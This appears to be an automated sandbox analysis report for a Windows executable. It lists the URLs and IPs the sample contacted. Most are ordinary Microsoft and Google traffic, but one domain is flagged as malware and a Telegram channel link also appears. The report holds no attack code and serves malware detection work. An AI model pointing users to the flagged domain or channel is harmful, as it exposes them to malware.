Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Windows Analysis Report
dwpk5JGAxF.exe

Name	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.bd02dd0f5f9b69ef8b17.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.974be19b726ee5d36d07.js	false		high
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531	false		high
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true	false		high
https://assets.msn.com/statics/icons/favicon_newtabpage.png	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/common.e407aa81c62081bf13cf.js	false		high
https://fua.4t.com/	true	Avira URL Cloud: malware	unknown
https://sb.scorecardresearch.com/b?rn=1740553887868&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2D46568907146C271CFD431606766D23&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://t.me/g02f04	false		high

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.78	play.google.com	United States	15169	GOOGLEUS	false
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
2.22.242.105	a416.dscd.akamai.net	European Union	20940	AKAMAI-ASN1EU	false
216.58.206.33	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
108.139.47.33	unknown	United States	16509	AMAZON-02US	false
150.171.28.10	ax-0001.ax-msedge.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.74.129.1	c-msn-pme.trafficmanager.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.44.201.22	unknown	United States	20940	AKAMAI-ASN1EU	false
20.42.73.27	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false